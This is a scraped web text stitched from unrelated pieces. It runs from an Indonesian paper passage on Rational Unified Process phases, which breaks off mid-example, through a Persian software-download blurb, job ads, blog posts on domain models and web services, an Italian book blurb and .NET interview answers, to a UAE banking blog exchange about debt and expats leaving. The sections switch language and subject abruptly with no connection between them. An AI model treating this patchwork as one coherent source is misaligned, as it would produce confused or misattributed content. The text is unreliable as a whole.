RUP sebagai architecture-centric. Architeture ini merupakan fokus yang dibahas pada fase elaboration yang akan dibahas pada bagian lain makalah ini. Software architecture design merupakan artifact dasar yang diperoleh dari sebuah architecture. Artifact lain yang diperoleh dari sebuah architecture ini diantaranya dapat membuat garis pedoman desain yang dipakai, struktur produk, dan team structure. Dalam merepresentasikan sebuah architecture pada software development kita menggunakan yang disebut The 4+1 view model yang telah kita kenal saat mempelajari UML. View model itu terdiri dari : logical view (dipakai oleh analyst/designer), implementation view (dipakai oleh progammer), process view (dipakai oleh system integrator), dan deployment view (dipakai oleh system engineering), serta ditambah dengan use case view (dipakai oleh end user). Keuntungan dari architecture centric process diantaranya memperbolehkan kita untuk menambah dan menambah intellectual control sebuah proyek untuk mengatur kompleksitas dan membangun system integrity. Proses arsitektur ini memiliki lifecycle phase, yang terdiri dari inception phase, elaboration phase, construction phase, dan transition phase. Setiap fase yang ada dihubungkan dengan milestone, yaitu suatu point evaluasi dari suatu tahap fase yang sudah selesai dibuat,
2.2.2 Sejarah Rational Unified Process
RUP merupakan produk proses perangkat lunak yang awalnya dikembangkan oleh Rational Software. Rational Software diakuisisi oleh IBM pada Februari 2003. Produk ini memuat basis-pengetahuan yang bertautan dengan artefak sederhana disertai deskripsi detail dari beragam aktivitas. RUP dimasukkan dalam produk IBM Rational Method Composer (RM C) yang memungkinkan untuk kustomisasi proses. Dengan mengombinasikan pengalaman dari banyak perusahaan, dihasilkan enam praktik terbaik untuk rekayasa perangkat lunak modern: Pengembangan iteratif, dengan risiko sebagai pemicu iterasi primer Kelola persyaratan Terapkan arsitektur yang berbasis komponen Visualisasikan model perangkat lunak Secara kontinyu, verifikasi kualitas Kendalikan perubahan.
2.2.3 Keuntungan RUP
Keuntungan yang didapat dengan menggunakan pendekatan iterasi diantaranya adalah : mengurangi resiko lebih awal, perubahan yang dilakukan lebih mudah diatur, higher level of reuse, project team memiliki waktu lama untuk memahami sistem yang akan dibangun, dan menghasilkan kualitas yang lebih baik di segala aspek.
RUP menawarkan berbagai kemudahan dalam membangun sebuah sotfware, ada yang disebut Six Best Practices yang terdiri dari :
  • Develop Iteratively
  • Manage Requirement
  • Use Component-based Architecture
  • Model Visually
  • Verify Quality
  • Control Changes to software
Semua proses yang dilakukan oleh RUP akan memberikan keuntungan pada tahapan membangun sebuah software. Saat melakukan perancangan sebuah perangkat lunak, tentunya setiap tahapan akan mendapatkan masalah. Biasanya gejala/symptom yang menunjukkan ada masalah dalam proses perancangan software seperti berikut :
  • Ketidak akuratan dalam memahami kebutuhan end-user.
  • Ketidakmampuan untuk menyetujui perubahan kebutuhan yang diajukan.
  • Modul-modul yang dibutuhkan tidak dapat dihubungkan.
  • Software yang sulit untuk dibangun atau diperluas.
  • Terlambat menemukan kerusakan project yang serius.
  • Kualitas software yang buruk.
  • Kemampuan software yang tidak dapat diterima.
Team members yang bekerja sendiri-sendiri sulit untuk mengetahui perubahan yang telah dilakukan karena ada perbedaan dalam membangun software tersebut. Ada ketidakpercayaan dalam membangun dan me-release proses. Usaha untuk menghilangkan symptom ini tidak akan menyelesaikan masalah yang dihadapi software developer karena gejala ini dapat terjadi oleh adanya penyebab utama masalah yang timbul saat membangun sebuah sistem, yaitu :
  • Requirement management yang tidak mencukupi
  • Komunikasi yang ambigu dan tidak tepat
  • Arsitektur yang rapuh
  • Kompleksitas yang sangat besar
  • Tidak terdeteksinya ketidakkonsistenan antara requirement,desain, dan implementasi
Pengetesan yang tidak mencukupi
  • Penilaian status project yang subjektif
  • Keterlambatan pengurangan resiko yang disebabkan waterfall development
  • Perkembangan yang tidak terkontrol
  • Otomatisasi yang kurang
Semua hambatan yang ditemui saat membangun software akan dapat diatasi dengan menggunakan best practise yang telah disebutkan di awal pembahasan. Dengan menggunakan best practise yang diterapkan oleh Rational Unified Process, akar masalah yang menyebabkan timbulnya symptom dalam software developer akan teratasi dengan baik.
Sebelum kita membahas lebih dalam mengenai Rational Unified Process, kita perlu untuk mengetahui terlebih dahulu apa maksud dari proses itu sendiri. Proses merupakan suatu tahapan yang mendefinisikan siapa yang mengerjakan apa, kapan dan bagaimana meraih suatu tujuan yang pasti. RUP merepresentasikan empat elemen dasar untuk memodelkan pertanyaan yang muncul dari sebuah proses, yaitu workers, activities, artifacts, dan workflows.
Worker mendefinisikan behavior/kelakuan dan responsibilities dari seseorang atau sebuah team. Dalam Unified Process, worker lebih diartikan sebagai bagaimana team/individual seharusnya bekerja. Sedangkan tanggungjawab bagi worker adalah melakukan serangkaian aktifitas sebagai pemilik dari sekumpulan artifact.
Activity dari spesific worker adalah sebuah unit kerja yang dilakukan seorang individu. Tujuannya cukup jelas,yaitu membuat/meng-update artifact. Setiap activity diberikan kepada spesific worker dan harus dapat digunakan sebagai elemen dalam planning dan progress software development. Contoh activity diantaranya : merencanakan sebuah iteration untuk worker Project Manager, menemukan use case dan aktor untuk worker System Analyst, dan sebagainya.
Artifact merupakan sekumpulan informasi yang dihasilkan, diubah, dan dipakai dalam sebuah proses. Artifact digunakan sebagai input bagi worker untuk melakukan activity dan juga sebagai output dari activity. Dalam object-oriented design, activities adalah operasi yang dilakukan aktif object(worker) sedangkan artifact sebagai parameter dari activities tersebut. Contoh artifact yaitu: model (uses case model), document,source code,dan lain-lain.
Workflow adalah serangkaian activities yang menghasilkan nilai hasil yang dapat terlihat. Dalam UML, workflow digambarkan dengan sequence diagram, collaboration diagram, atau activity diagram. Workflow tidak selalu dapat dipakai untuk merepresentasikan semua ketergantungan yang ada diantara activities. Karena,terkadang dua buah activities yang digambarkan dalam workflow sebenarnya sangat rapat jalinannya yang melibatkan worker yang sama padahal mungkin penggambarannya tidak terlalu tepat.


3.1 Fase-Fase Enterprise Unified Process

3.1.1 Inception
Tahap inception fokus pada penentuan manfaat perangkat lunak yang harus dihasilkan, penetapan proses-proses bisnis (business case), dan perencanaan proyek.
  • Menentukan Ruang lingkup proyek
  • Membuat ‘Business Case’
  • Menjawab pertanyaan “apakah yang dikerjakan dapat menciptakan ‘good business sense’ sehingga proyek dapat dilanjutkan

3.1.2 Elaboration
Tahap untuk menentukan use case (set of activities) dari perangkat lunak berikut rancangan arsitekturnya.
  • Menganalisa berbagai persyaratan dan resiko
  • Menetapkan ‘base line’
  • Merencanakan fase berikutnya yaitu construction

3.1.3 Construction

Membangun produk perangkat lunak secara lengkap yang siap diserahkan kepada pemakai.
  • Melakukan sederetan iterasi
  • Pada setiap iterasi akan melibatkan proses berikut: analisa desain, implementasi dan testing

3.1.4 Transition
Menyerahkan perangkat lunak kepada pengguna, mengujinya ditempat pengguna, dan memperbaiki masalah-masalah yang muncul saat dan setelah pengujian.
  • Membuat apa yang sudah dimodelkan menjadi suatu produk jadi
  • Dalam fase ini dilakukan: Beta dan performance testing; Membuat dokumentasi tambahan seperti training, user guides, dan sales kit; Membuat rencana peluncuran produk ke komunitas pengguna

3.1.5 Production

Selama fase ini, anda akan mempertahankan proyek, artinya dengan menjalankan usaha komunikasi, kemudian melanjutkan pelatihan dan pengjaran, dan melanjutkan pengaturan dari proses yang akan anda pelajari.

3.1.6 Retirement
Dalam fase ini terdapat pemindahan data dan sistem integrasi yang baik

3.2 Praktik Praktik Enterprise Unified Process

  • Mengembangkan iteratif
  • Mengelola persyaratan
  • Arsitektur Pembtuktian
  • Modeling/Perancangan
  • Memverifikasi kualitas secara terus-menerus
  • Mengelola perubahan
  • Pembangunan Berkolaborasi
  • Melihatlah pencapaian pembangunan
  • Memberikan perangkat lunak bekerja secara teratur
  • Mengelola risiko


Contoh kasus fase-fase Enterprise Unified Process SMS Gateway

4.1 Inception
Mendefinisikan Ruang Lingkup

دانلود beaTunes v5.0.1 MacOSX - نرم افزار مدیریت بایگانی آی تونز برای مک

 beaTunes نام نرم افزاری می باشد که در ابتدا ابزاری برای شناسایی BPM برای دی جی ها، دونده ها و رقاص ها شروع به کار کرد و الان یک از بهترین نرم افزار های مدیریت بایگانی آیتونز شده است. یکی ...
دانلود beaTunes v5.0.1 MacOSX - نرم افزار مدیریت بایگانی آی تونز برای مک ...

مطالب مرتبط:

          Sr Director, Biomedical IT Operations - American Red Cross - United States   
Will work as part of the Biomed IT team innovating and applying best practice techniques for developing, enhancing, and deploying database, software...
From American Red Cross - Mon, 17 Apr 2017 19:29:37 GMT - View all United States jobs
          What is a Domain Model?   

When searching recently so as to provide further reading for "domain model" in a recent post, I was quite surprised to find that there seemed to be no good definition readily available (at least not by Googling "domain model").  Since I tend to use this term a lot, I figured I'd try to fill this gap and, at the very least, provide a reference for me to use when I talk about it.

So What is a Domain Model?
Put simply, a domain model is the software model of a particular domain of knowledge (is that a tautology?).  Usually, this means a business domain, but it could also mean a software domain (such as the UI domain, the data access and persistence domain, the logging domain, etc.).  More specifically, this means an executable representation of the objects in a domain with a particular focus on their behaviors and relationships1.

The point of the domain model is to accurately represent these objects and their behaviors such that there is a one-to-one mapping from the model to the domain (or at least as close as you can get to this).  The reason this is important is that it is the heart of software solutions.  If you accurately model the domain, your solution will actually solve the problems by automating the domain itself, which is the point of pretty much all business software.  It will do this with much less effort on your part than other approaches to software solutions because the objects are doing the work that they should be doing--the same that they do in the physical world.  This is part and parcel of object-oriented design2.

Nothing New
By the way, this is not a new concept--OO theory and practice has been around for decades.  It's just that somewhere along the line, the essence of objects (and object-oriented design) seems to have been lost or at least distorted, and many, if not most, Microsoft developers have probably not been exposed to it, have forgotten it, or have been confused into designing software in terms of data.  I limit myself to "Microsoft developers" here because it is they of whom I have the most experience, but I'd wager, from what I've read, the same is true of Java and other business developers. 

I make this claim because everyone seems to think they're doing OO, but a concrete example of OOD using Microsoft technologies is few and far between.  Those who try seem to be more concerned with building in framework services (e.g., change tracking, data binding, serialization, localization, and data access & persistence) than actually modeling a domain.  Not that these framework services are not important, but it seems to me that this approach is fundamentally flawed because the focus is on software framework services and details instead of on the problem domain--the business domain that the solutions are being built for. 

The Data Divide
I seem to write about this a lot; it's on my mind a lot3.  Those who try to do OOD with these technologies usually end up being forced into doing it in a way that misses the point of OOD.  There is an unnatural focus on data and data access & persistence.  Okay, maybe it is natural or it seems natural because it is ingrained, and truly a large part of business software deals with accessing and storing data, but even so, as I said in Purporting the Potence of Process4, "data is only important in as much as it supports the process that we’re trying to automate." 

In other words, it is indeed indispensable but, all the same, it should not be the end or focus of software development (unless you're writing, say, a database or ORM).  It may sound like I am anti-data or being unrealistic, but I'm not--I just feel the need to correct for what seems to be an improper focus on data.  When designing an application, think and speak in terms of the domain (and continue to think in terms of the domain throughout the software creation process), and when designing objects, think and speak in terms of behaviors, not data. 

The data is there; the data will come, but your initial object models should not involve data as a first class citizen.  You'll have to think about the data at some point, which will inevitably lead to specifying properties on your objects so you can take advantage of the many framework services that depend on strongly-typed properties, but resist the temptation to focus on properties.  Force yourself to not add any properties except for those that create a relationship between objects; use the VS class designer and choose to show those properties as relationships (right-click on the properties and choose the right relationship type).  Create inheritance not based on shared properties but on shared behaviors (this in itself is huge).  If you do this, you're taking one step in the right direction, and I think in time you will find this a better way to design software solutions.

My intent here is certainly not to make anyone feel dumb, stupid, or like they've wasted their lives in building software using other approaches.  My intent is to push us towards what seems to be a better way of designing software.  Having been there myself, I know how easy it is to fall into that way of thinking and to imagine that simply by using these things called classes, inheritance, and properties that we're doing OOD the right way when we're really not.  It's a tough habit to break, but the first step is acknowledging that there is (or at least might be) a problem; the second step is to give object thinking a chance.  It seems to me that it is (still) the best way to do software and will continue to be in perpetuity (because the philosophical underpinnings are solid and not subject to change).

1. An object relationship, as I see it, is a special kind of behavior--that of using or being used.  This is also sometimes represented as a having, e.g., this object has one or more of these objects.  It is different from data because a datum is just a simple attribute (property) of an object; the attribute is not an object per se, at least not in the domain model because it has no behaviors of its own apart from the object it is attached to.  It is just information about a domain object.

2. I go into this in some depth in the Story paper in the Infragistics Tangerine exemplar (see the "To OOD or Not to OOD" section).  I use the exemplar itself to show one way of approaching domain modeling, and the Story paper describes the approach.

3. Most recently, I wrote about this in the Tangerine Story (see Note 2 above).  I also wrote publicly about it back in late 2005, early 2006 in "I Object," published by CoDe Magazine.  My thought has developed since writing that.  Interestingly, in almost two years, we seem to have only gotten marginally better ways to deal with OOD in .NET. 

4. In that article, I put a lot of focus on "process."  I still think the emphasis is valid, but I'd temper it with the caveat that however business rules are implemented (such as in the proposed workflow-driven validation service), you still think of that as part of your domain model.  The reason for separating them into a separate workflowed service is a compromise between pragmatism and idealism given the .NET platform as the implementation platform.  I've also since learned that the WF rules engine can be used apart from an actual .NET workflow, so depending on your application needs, just embedding the rules engine into your domain model may be a better way to go than using the full WF engine.  If your workflow is simple, this may be a better way to approach doing validation.

          Web Services Best Practices   

As I sit here on my deck, enjoying the cool autumn breeze1, I thought, what better thing to write about than Web services!  Well, no, actually I am just recalling some stuff that's happened lately.  On the MSDN Architecture forums and in some coding and design discussions we had this week, both of which involve the question of best practices for Web services.

Before we talk about Web services best practices, it seems to me that we need to distinguish between two kinds of application services.  First, there are the services that everyone has been talking about for the last several years--those that pertain to service-oriented architecture (SOA).  These are the services that fall into the application integration camp, so I like to call them inter-application services. 

Second, there are services that are in place to make a complete application, such as logging, exception handling, data access and persistence, etc.--pretty much anything that makes an application go and is not a behavior of a particular domain object.  Maybe thinking of them as domain object services would work, but I fear I may already be losing some, so let's get back to it.  The main concern within this post are those services using within an application, so I call them intra-application services.

It seems like these latter services, the intra-application ones, are being often confused with the former--the inter-application services.  It's certainly understandable because there has been so much hype around SOA in recent years that the term "service" has been taken over and has lost its more generic meaning.  What's worse is that there has been a lot of confusion around the interaction of the terms Web service and just plain service (in the context of SOA).  The result is that you have folks thinking that all Web services are SO services and sometimes that SO services are always Web services.

My hope here is to make some clarification as to the way I think we should be thinking about all this.  First off, Web services are, in my book at least, simply a way of saying HTTP-protocol-based services, usually involving XML as the message format.  There is no, nor should there be, any implicit connection between the term Web service and service-oriented service.  So when you think Web service, don't assume anything more than that you're dealing with a software service that uses HTTP and XML. 

The more important distinction comes in the intent of the service--the purpose the service is designed for.  Before you even start worrying about whether a service is a Web service or not, you need to figure out what the purpose of the service is.  This is where I get pragmatic (and those who know me know that I tend to be an idealist at heart).  You simply need to determine if the service in question will be consumed by a client that you do not control. 

The reason this question is important is that it dramatically affects how you design the service.  If the answer is yes, you automatically take on the burden of treating the service as an integration (inter-application) service, and you must concern yourself with following best practices for those kinds of services.  The core guideline is that you cannot assume anything about the way your service will be used.  These services are the SO-type services that are much harder to design correctly, and there is tons of guidance available on how to do them2.  I won't go in further depth on those here.

I do think, though, that the other kind of services--intra-application services--have been broadly overlooked or just lost amidst all the discussion of the other kind.  Intra-application services do not have the external burdens that inter-application services have.  They can and should be designed to serve the needs of your application or, in the case of cross-cutting services (concerns) to serve the needs of the applications within your enterprise.  The wonderful thing about this is that you do have influence over your consumers, so you can safely make assumptions about them to enable you to make compromises in favor of other architectural concerns like performance, ease of use, maintainability, etc.

Now let's bring this back to the concrete question of best practices for intra-application Web services.  For those who are using object-oriented design, designing a strong domain model, you may run into quite a bit of trouble when you need to distribute your application across physical (or at least process) tiers.  Often this is the case for smart client applications--you have a rich front end client that uses Web services to communicate (usually for data access and persistence).  The problem is that when you cross process boundaries, you end up needing to serialize, and with Web services, you usually serialize to XML.  That in itself can pose some challenges, mainly around identity of objects, but with .NET, you also have to deal with the quirks of the serialization mechanisms.

For example, the default XML serialization is such that you have to have properties be public and  read-write, and you must have a default constructor.  These can break encapsulation and make it harder to design an object model that you can count on to act the way you expect it to.  WCF makes this better by letting you use attributes to have better control over serialization.  The other commonly faced challenge is on the client.  By default, if you use the VS Add Web Reference, it takes care of the trouble of generating your service proxies, but it introduces a separate set of proxy objects that are of different types than your domain objects.

So you're left with the option of either using the proxy as-is and doing a conversion routine to convert the proxy objects to your domain objects, or you can modify the proxy to use your actual domain objects.  The first solution introduces both a performance (creating more objects and transferring more data) and a complexity (having conversion routines to maintain) hit; the second solution introduces just a complexity hit (you have to modify the generated proxy a bit).  Neither solution is perfectly elegant--we'd need the framework to change to support this scenario elegantly; as it is now, the Web services stuff is designed more with inter-application services in mind (hence the dumb proxies that encourage an anemic domain model) than the intra-application scenario we have where we intend to use the domain model itself on the client side.

If you take nothing else away from this discussion, I'd suggest the key take away is that when designing Web services, it is perfectly valid to do so within the scope of your application (or enterprise framework).  There is a class of services for which it is safe to make assumptions about the clients, and you shouldn't let all of the high-falutin talk about SOA, WS-*, interoperability, etc. concern you if your scenario does not involve integration with other systems that are out of your control.  If you find the need for such integration at a later point, you can design services (in a service layer) then to meet those needs, and you won't be shooting yourself in the foot trying to design one-size-fits-all services now that make so many compromises so as to make the app either impossible to use or very poorly performing.

My own preference that I'd recommend is to use the command-line tools that will generate proxies for you (you can even include a batch file in your project to do this) but then modify them to work with your domain model--you don't even need your clients to use the service proxies directly.  If you use a provider model (plugin pattern) for these services, you can design a set of providers that use the Web services and a set that talk directly to your database.  This enables you to use your domain model easily in both scenarios (both in a Web application that talks directly to the db as well as a smart client that uses Web services). 

It requires a little extra effort, but it means you can design and use a real domain model and make it easier easier to use by hiding the complexity of dealing with these framework deficiencies for consumers of the domain model.  This is especially helpful in situations where you have different sets of developers working on different layers of the application, but it is also ideal for use and reuse by future developers as well.

One of these days, I'll write some sample code to exemplify this approach, maybe as part of a future exemplar.

1. The weatherthing says it's 65 degrees Fahrenheit right now--at 1pm!
2. My observation is that it is safe to assume that when other people talk about services and Web services, these are the kind they're thinking of, even if they don't make the distinction I do in this post. 

          Atlante Nutrizionale della Vite   

Atlante nutrizionale della vite rappresenta la sintesi di circa trent’anni di ricerche sullo stato nutritivo dei vigneti italiani, pubblicate sotto il nome di carte nutrizionali o nutritive.

La metodologia adottata comprende l’analisi del terreno, la diagnostica fogliare, la determinazione dei consumi di elementi, le perdite degli elementi. La connessione fra queste analisi ha consentito di giungere a un consiglio orientativo di concimazione.

In totale sono state controllate 171 sottozone appartenenti a 52 macrozone di 15 Regioni e 412 comuni e frazioni di tutta l’Italia, dal nord (Bolzano) alla Sardegna e alla Sicilia.

Per queste indagini è stato compiuto un lavoro impressionante, perché sono stati controllati 4.480

vigneti e analizzati 4.500 campioni di terreno, 9.000 campioni di foglie, nonché alcune centinaia di campioni di germogli della potatura verde, di grappoli alla vendemmia, di tralci invernali e di foglie alla caduta, per determinare i consumi di elementi dei vigneti. Il totale delle analisi ammonta a circa 15.000 campioni. Le ricerche delle zonazioni nutrizionali comprese nell’atlante hanno riguardato 85 forme di allevamento e 189 varietà sparse in tutta Italia, ovviamente con frequenti ripetizioni nelle 171 sottozone controllate.

L’insieme dei dati scaturiti rappresenta il più grande database specializzato nella concimazione della vite. Tutto questo lavoro non poteva essere dimenticato e si è pertanto pensato di tradurlo in un atlante che potesse essere da guida per gli operatori nella concimazione della vite.

Il libro, dunque, è un’opera originale che può essere utile ai viticoltori, ai tecnici, agli studenti e ai docenti che insegnano la materia della viticoltura.

          The New EWG Verified Seal of Approval   
In case you haven’t heard, the Environmental Working Group (EWG) has always been a source of product analysis and has an online rating system for skin care and body care products (EWG Skin Deep Database) which has been a valuable resource for us as consumers and as conscientious shoppers. I have not always agreed with... Read More »

          Technical Interview Questions   
I have been on some recent technical interviews for Tech Lead and/or Architect Roles. I am keeping track of the questions asked and will post them here.  The answers you see are mostly copy/paste from a Google search, with a mix of my own thoughts.  Feel free to jump in with your own questions and/or answers. 

1.       define encapsulation

a.       Data /Information hiding, hiding; objects do not reveal their attributes  and behaviors.  All interaction with an object should be done thru it’s interface.  

b.      Storing data and functions in a single unit (class) is encapsulation. Data cannot be accessible to the outside world and only those functions which are stored in the class can access it.

c.       The purpose is to achieve potential for change: the internal mechanisms of the component can be improved without impact on other components, or the component can be replaced with a different one that supports the same public interface. Encapsulation also protects the integrity of the component, by preventing users from setting the internal data of the component into an invalid or inconsistent state. Another benefit of encapsulation is that it reduces system complexity and thus increases robustness, by limiting the interdependencies between software components.

2.       define abstraction

a.       the act of representing essential features without including the background details or explanations.

b.      reduce and factor out details so that one can focus on a few concepts at a time.

3.       define garbage collection and what is meant by generational GC

a.       The .NET Framework's garbage collector manages the allocation and release of memory for your application. Each time you use the new operator to create an object, the runtime allocates memory for the object from the managed heap. As long as address space is available in the managed heap, the runtime continues to allocate space for new objects. However, memory is not infinite. Eventually the garbage collector must perform a collection in order to free some memory. The garbage collector's optimizing engine determines the best time to perform a collection, based upon the allocations being made. When the garbage collector performs a collection, it checks for objects in the managed heap that are no longer being used by the application and performs the necessary operations to reclaim their memory.

b.      The garbage collector keeps track of objects that have Finalize methods, using an internal structure called the finalization queue. Each time your application creates an object that has a Finalize method, the garbage collector places an entry in the finalization queue that points to that object. The finalization queue contains entries for all the objects in the managed heap that need to have their finalization code called before the garbage collector can reclaim their memory.

c.       Generational collectors group objects by age and collect younger objects more often than older objects. When initialized, the managed heap contains no objects. All new objects added to the heap can be said to be in generation 0, until the heap gets filled up which invokes garbage collection. As most objects are short-lived, only a small percentage of young objects are likely to survive their first collection. Once an object survives the first garbage collection, it gets promoted to generation 1.Newer objects after GC can then be said to be in generation 0.The garbage collector gets invoked next only when the sub-heap of generation 0 gets filled up. All objects in generation 1 that survive get compacted and promoted to generation 2. All survivors in generation 0 also get compacted and promoted to generation 1. Generation 0 then contains no objects, but all newer objects after GC go into generation 0. Thus, as objects "mature" (survive multiple garbage collections) in their current generation, they are moved to the next older generation. Generation 2 is the maximum generation supported by the runtime's garbage collector. When future collections occur, any surviving objects currently in generation 2 simply stay in generation 2. Thus, dividing the heap into generations of objects and collecting and compacting younger generation objects improves the efficiency of the basic underlying garbage collection algorithm by reclaiming a significant amount of space from the heap and also being faster than if the collector had examined the objects in all generations.

                                                               i.      The GC maintains lists of managed objects arranged in "generations." A generation is a measure of the relative lifetime of the objects in memory. The generation number indicates to which generation an object belongs. Recently created objects are stored in lower generations compared to those created earlier in the application's life cycle. Longer-lived objects get promoted to higher generations. Because applications tend to create many short-lived objects compared to relatively few long-lived objects, the GC runs much more frequently to clean up objects in the lower generations than in the higher ones.

4.       define disposing in .NET

a.       Performs application-defined tasks associated with freeing, releasing, or resetting unmanaged resources.

5.       Define the difference between finalize and dispose in .NET

a.       In general, the Dispose pattern is used to release unmanaged resources in a timely fashion. This allows you to do this in a deterministic fashion- in other words, you have control over when they are released. The Object.Finalize method is also used for the purpose of releasing resources - but it is non-deterministic. You have no control over when it will be called by the GC. Further, implementing a Finalize method can have an adverse affect on the performance of the GC because it takes two passes of the GC to collect objects that override Finalize.  So, in general, if you are using objects that manage unmanaged resources, such as database connections, you implement IDisposable AND override  Finalize. This way, your covered if the client fails to call Dispose - you know that your resources will then be released when the object is GC'd. Of course, one you call Dispose - you don't need the finalize method to be called by the GC and suffer an unnecessary performance hit.

6.       xml tags and attributes



7.       define soa

a.       Service Oriented Architecture: putting enterprise functionality that rarely or never changes in the enterprise into a service that all enterprise applications can call into; typically a web service

b.      SOA is the practice of sequestering the core business functions into independent services that don’t change frequently. These services are glorified functions that are called by one or more presentation programs. The presentation programs are volatile bits of software that present data to, and accept data from, various users.

c.       At the highest level, SOA is nothing more (and nothing less) than separating changeable elements from unchangeable elements

d.      SOA is not about any particular technology. Rather it is a design philosophy that decouples well heeled business functions from volatile processes and presentation

8.       define soap


9.       define serialization

a.       the process of converting the state of an object into a form that can be persisted or transported. The complement of serialization is deserialization, which converts a stream into an object. Together, these processes allow data to be easily stored and transferred.

b.      NET Framework features two serializing technologies:

                                                               i.      Binary serialization preserves type fidelity, which is useful for preserving the state of an object between different invocations of an application. For example, you can share an object between different applications by serializing it to the Clipboard. You can serialize an object to a stream, to a disk, to memory, over the network, and so forth. Remoting uses serialization to pass objects "by value" from one computer or application domain to another.

                                                             ii.      XML serialization serializes only public properties and fields and does not preserve type fidelity. This is useful when you want to provide or consume data without restricting the application that uses the data. Because XML is an open standard, it is an attractive choice for sharing data across the Web. SOAP is likewise an open standard, which makes it an attractive choice.

10.   define DTO

a.       Data Transfer Object; could be custom Business Objects, DataSets

11.   Define marshalling

a.       The process of gathering data and transforming it into a standard format before it is transmitted over a network so that the data can transcend network boundaries. In order for an object to be moved around a network, it must be converted into a data stream that corresponds with the packet structure of the network transfer protocol. This conversion is known as data marshalling. Data pieces are collected in a message buffer before they are marshaled. When the data is transmitted, the receiving computer converts the marshaled data back into an object.

b.      Data marshalling is required when passing the output parameters of a program written in one language as input to a program written in another language.


12.   Define interactions with business folks, selling your idea, coaching them, etc


13.   define design patterns, give an example of 2


14.   define Polymorphism

a.       “Many Forms”.   The ability of a derived class to perform its own implementation of a parents  method thus re-defining the method.  It’s the ability to hide alternative implementations behind a common interface.


15.   learn more about current web services, messaging, patterns, etc


16.   What does the finalize method do and when to use it

a.       allows an object to clean up its unmanaged resources properly when the garbage collector reclaims the memory used by the object

b.      By default, the Finalize method does nothing. If you want the garbage collector to perform cleanup operations on your object before it reclaims the object's memory, you must override the Finalize method in your class

c.       The unmanaged resources must be explicitly released once the application has finished using them. .Net Framework provides the Object.Finalize method: a method that the garbage collector must run on the object to clean up its unmanaged resources, prior to reclaiming the memory used up by the object. Since Finalize method does nothing, by default, this method must be overridden if explicit cleanup is required.

d.      Finalize provides a backup to prevent resources from permanently leaking if the programmer fails to call Dispose

17.   What is reflection and when would one use it

a.       The ability to discover the composition of a type (e.g., class, interface, structure, enumeration, or delegate) at runtime.

b.      The classes in the System.Reflection namespace, together with System.Type, allow you to obtain information about loaded assemblies and the types defined within them, such as classes, interfaces, and value types. You can also use reflection to create type instances at run time, and to invoke and access them.

18.   Define AppDomains

19.   Define Clustered Indexes in SQL Server


          Senior Oracle DBA with operational and R&D experience   
Senior Oracle DBA with operational and R&D experience 3+ Years experience as an Oracle DBA both from an operational and R&D perspective. 1+ Years experience as an "Open Source" DBA of either MySQL or PostgreSQL.Appetite for learning new technologies and getting your hands dirty with cutting edge database solutions. Self proficient and hard worker.Fluent in speaking and writing technological English.Experience in:Proven hands-on with operating and managing Oracle 12c databases and de...
          Damn Banks II   
I received a comment on my last post from Anonymous who seems to be an insider at one time. It was very informative and brought up some good points that I had to answer. The comment was long and my responses were at least just as long so I decided to make a new post. Maybe we all can learn something and clear up some misunderstandings, if any.

Anonymous is in yellow text, mine in white.

Anonymous said...

    LOL! SOME of what you said is true, some are "spiced" if you will.

    BTW, that building that you said came from somewhere... It isnt OWNED by NBAD. That building is owned by a member of a royal family. 3 floors are rented by NBAD.

You maybe have me there! I looked for a stock photo of a big building with the NBAD logo on it for the first photo. Its kind of a blogging thing. Here is the real HQ, the NBAD tower.

NBAD Tower

    There is no link with immigration, or with the traffic dept. If you want I will tell you the exact process (I had sadly asked that many ppl be bared from flying myself)

When a person properly quits their job, they have to surrender their passport to their employer/sponsor and will only get it back (on the day of travel) after all paperwork, including clearance letters from the banks et al, are submitted. If an expat cannot provide these, they do not get their passport back until all debts are paid. They can't leave as they have they have no passport, job or home at this point. I have heard jail is a desperate option.

What this does is creates the runner/absconder phenominon. Things go bad here with some folks for various reasons and they are deep enough in debt they cannot come up with the cash to settle local debts. So instead of having the option of leaving and paying the debt from abroad, they get desperate and just escape. I see enough dusty cars with flat tires in airport parking lots to know this is quite common. I think most people want to pay their debts but these rules force some into a corner. Seems the banks stand to lose more the way things are than trying to work with their customers before it becomes a legal problem.

Curiously, as I said in a previous post the banks seem uninterested in retrieving these automotive orphans to mitigate losses.

Banks Seem Unconcerned About Recovering These Assets, They Are Everywhere

    Also, there are reasons why banks here cant allow people to pay for debt from abroad. Mainly because you cant enforce it in any way. If a bank scares you into thinking that it can "get" you when ur back home, they are usually mistaken. Few are the countries in which a bank here can get a bad debt holder to pay. Truth.

I think that is changing. I recently got a small personal loan and was asked for family addresses back in the US and my Social Security Number so I could be easily located.Debt collector firms wordwide purchase bad debts from banks all the time and take on the risk of recovering the debt. VISA and Mastercard are also global companies with aggressive collection methods and could damage my credit rating back in the US.

    There are however non official ways to continue to pay for asset backed loans (Like a car or house) but we wont get into those. I will say that I had set a few such schemes up for customers and they did not cause me any issues till the day I left. But not all customers are like that. With 20% of the country being labor, and another 30% being low level employees (with low incomes) you simply cant take chances with everyone. It it really is a chance.

    The banking system here is based on caution. In the UAE it's the exact opposite. Yes, a healthy way to be would to have a nice balance, but you have to understand the contact, this region is not a stable one. the UAE may be stable, but it's surrounded by shit and bad stuff.

    Also, with 90% of the country's population foreigners, the control you have over securing your loan is close to nil. Truth is if you take out 500K worth of loans and leave within a week, the bank will have no warning and little recourse.

I think any of the banks here would go after someone owing that amount of money. They would be crazy not to.

    As for banks not being all they can be to consumers, it depends both on the bank and the consumer.

    If you have a salary of 55K, a 1.6 million mortgage, a car loan, a personal loan, and credit cards, the banks are the best you'll ever deal with.

    If you make 55K and send 45 back home on the same day, most banks wont care about you.

I truly understand about the demographics here and the difficulties they bring.

    Also, not all banks here have the same focus. NBAD has, and is, and probably always will be a corporate bank. Its main job (originally, and still) is to be the banker of the Govt of the Emirate of Abu Dhabi as well as govt owned companies, semi govt companies, and large corporations.

    Do they have consumer banking solutions? yes. Are they good? Maybe. Are they the best? No.

    For a consumer, a more consumer focused bank like RAK bank might be a better option. RAK Bank is one of the few UAE banks that does NOT have a corporate banking section. Only consumer (you) and SME (Your small business)

    As for consumer rates (You mention a credit card at 35%) yes, it is highway robbery. But things are getting better. A few months back the central bank limited what a bank can offer and charge in terms of base banking and lending. CC were not included. Maybe in the revision next year. (Last year a certificate of liability costed 400, today its no more than 100 by law)

I have VISA and MC CC's with US banks that charge 10-12%. I agree 35% is very excessive for the same here. I took that aformentioned small personal loan (unsecured) for a very reasonable single digit rate. The credit cards are a cash cow and are aggressively marketed by commissioned salespeople. The rules seem lax and a lot of naive newcomers succomb the the lure of easy and high credit limits.

